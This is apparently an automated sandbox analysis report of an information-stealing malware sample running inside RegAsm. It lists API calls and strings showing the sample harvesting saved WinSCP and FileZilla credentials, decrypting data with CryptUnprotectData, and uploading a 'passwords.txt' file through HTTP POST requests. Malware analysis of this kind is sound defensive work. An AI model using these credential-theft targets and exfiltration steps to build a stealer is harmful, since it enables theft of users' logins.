                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$FreeInfoLocalLocalelstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                                                                  • API String ID: 3280604673-4001269591
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9d6df98df06dd7049007c4c707a33e25cbf5386fb355e087ae3499b3ae749645
                                                                                                                                                                                                                                                                                                  • Instruction ID: 28db25313739fa7c55f0f4920395dc49f99e05777687f376b1cd2e96ad76a857
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d6df98df06dd7049007c4c707a33e25cbf5386fb355e087ae3499b3ae749645
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54115E71A00219DBCB14DBD8D885BFDB7B9BB44300F54406EE605A3182DB785A89CBA9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FF5
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?), ref: 0040700D
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 0040702E
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2068576380-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9232affe9b4526a39fe20872f8c8b11f75dafd751c518c869054bd0ab9b412c9
                                                                                                                                                                                                                                                                                                  • Instruction ID: fbb42ef7c5f833057219cfc16333224a6ea03084bd53acd7e7d5f17b1ae716ea
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9232affe9b4526a39fe20872f8c8b11f75dafd751c518c869054bd0ab9b412c9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77011279A00209ABEB10DF98DC55FAA77B9EB88700F104559FB00AB380D675E9018B94
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                                                  • GetUserNameA.ADVAPI32(00000000,01562F00), ref: 00410247
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1206570057-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: InfoSystemwsprintf
• String ID:
• API String ID: 2452939696-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,015629C0), ref: 00418EF3
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,01562CA0), ref: 00418F0B
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,015712E0), ref: 00418F24
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,015712F8), ref: 00418F3C
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,01562A60), ref: 00418F54
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,01564480), ref: 00418F74
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,01564318), ref: 00418F8C
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,01571310), ref: 00418FA5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,01562D20), ref: 00418FBD
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,01562BA0), ref: 00418FD5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,01564200), ref: 00418FEE
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01571448), ref: 0041900E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01562BC0), ref: 00419026
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,0156F818), ref: 0041903F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01571538), ref: 00419057
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01571298), ref: 0041906F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01562A80), ref: 00419088
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01562C80), ref: 004190A0
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01571550), ref: 004190B8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01571568), ref: 004190D1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,01562B00), ref: 004190ED
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,01571328), ref: 00419105
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,015714C0), ref: 0041911E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,01571340), ref: 00419136
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,01571358), ref: 0041914E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75450000,01562D40), ref: 0041916A
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75450000,01562CC0), ref: 00419182
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75DA0000,01562AE0), ref: 0041919E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75DA0000,01571370), ref: 004191B6
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,01562AA0), ref: 004191D6
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,015629E0), ref: 004191EE
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,01562B80), ref: 00419207
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,015715B0), ref: 0041921F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,01562A00), ref: 00419237
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,01562A20), ref: 00419250
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,01562AC0), ref: 00419268
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,01571D00), ref: 00419280
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 00419297
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 004192AE
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6CB70000,SymMatchString), ref: 004193AE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                  • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-951535364
                                                                                                                                                                                                                                                                                                  • Opcode ID: 642cb2aa3f8729086897cfb93ee94fc5d46d0139e4968153179ea6914fe78371
                                                                                                                                                                                                                                                                                                  • Instruction ID: 407128440629eddd766dc5e7512111eaeb079ed8883c8e88aed7a912d7e36e24
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 642cb2aa3f8729086897cfb93ee94fc5d46d0139e4968153179ea6914fe78371
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 876202BDA10620EFE754DFA5ED98A2637BBF74AB017106529EA05C3374E734A841CF60
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C42B
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C44A
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C462
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C47A
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C48D
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C49B
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C4AC
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,"@), ref: 0040C4CE
                                                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32("@,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040C50F
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,"@), ref: 0040C547
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset$Open$Value
                                                                                                                                                                                                                                                                                                  • String ID: "@$:22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 2608732736-1877921674
                                                                                                                                                                                                                                                                                                  • Opcode ID: fb3acdcaa7eefa8502316789a7024bdd860385d8f84b5ea39cbb2eb7832996cd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2eae617b6bbfa68bfe5d41b46deb2d66e6faa0f044e0e836418075379cf6a55f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb3acdcaa7eefa8502316789a7024bdd860385d8f84b5ea39cbb2eb7832996cd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCD17BB590022DEFDB10DBE4CC85EEFBB7DAB48705F10455AF605A3280D7786E488BA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411720: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411744
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411720: GetProcessHeap.KERNEL32(00000000,?,?,00404EBA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00411753
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411720: RtlAllocateHeap.NTDLL(00000000,?,?,00404EBA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041175A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0156F958,00426897,00426893,0042688B,00426887,00426886), ref: 00404F51
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,?,?,?), ref: 00404F77
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A1
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,0156F8F8,?,015724D8,00000000,00000000,-00400100,00000000), ref: 004050E2
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405108
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,0156F198,00000000,?,00426950,00000000,?,?), ref: 00405600
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00405612
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405625
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040562C
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040563E
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00405652
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?), ref: 0040566B
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00405675
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00405686
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040569F
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004056AC
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,00000000), ref: 004056C2
                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004056D3
                                                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004056FB
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00405744
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 0040579B
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 004057B3
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004057BE
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004057CF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$FileOpenReadRequestlstrcat$AllocAllocateBinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
                                                                                                                                                                                                                                                                                                  • String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                                                                                                                  • API String ID: 1135472144-3618031631
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1101776c67f9eaf2207cb236d24d32091fa0778eb9b540aedaa0788034abeadb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 540930a84d7bb7e5f2c659243df0843e1f0a5bb5435f8e757a205e5e1652ed83
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1101776c67f9eaf2207cb236d24d32091fa0778eb9b540aedaa0788034abeadb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67622E71801149EADB15EBA1C951BEEBBB8AF19304F50407EE601731D2DF786A4CCBB5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116D0: LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0040C989
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00426B36,00426B33,00426B32,00426B2F), ref: 0040C9DF
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9E6
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CA06
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA11
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: malloc.MSVCRT ref: 00411B61
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: strncpy.MSVCRT ref: 00411B71
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CA48
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA53
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 0040CA90
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA9B
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CAD8
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAE7
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CB73
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CB8B
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBA3
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBBB
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Soft: FileZilla), ref: 0040CBD3
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Host: ), ref: 0040CBE2
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CBF5
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F08), ref: 0040CC04
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC17
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F0C), ref: 0040CC26
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Login: ), ref: 0040CC35
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC48
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F18), ref: 0040CC57
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Password: ), ref: 0040CC66
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC79
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F28), ref: 0040CC88
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F2C), ref: 0040CC97
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0040CCDB
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00418083,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CCF1
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040CD42
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                                                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$>kB;kB:kB$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 433178851-2340581703
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0864dcb1a903e9fa47c799f6ead7014f60aaf1fdb1e7a25ab1264df11e5aa3c5
                                                                                                                                                                                                                                                                                                  • Instruction ID: d11abaa09dd60fea0b83d1247216ad2e93eb725a93b7f2adba71b57396a44103
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0864dcb1a903e9fa47c799f6ead7014f60aaf1fdb1e7a25ab1264df11e5aa3c5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAE19275D00218AACB14EBE0DD56BEEBB79AF19304F50046EF501B31D2DF786A08CB69
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

• control_flow_graph 573, first block 405ce0-405dd2 (legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
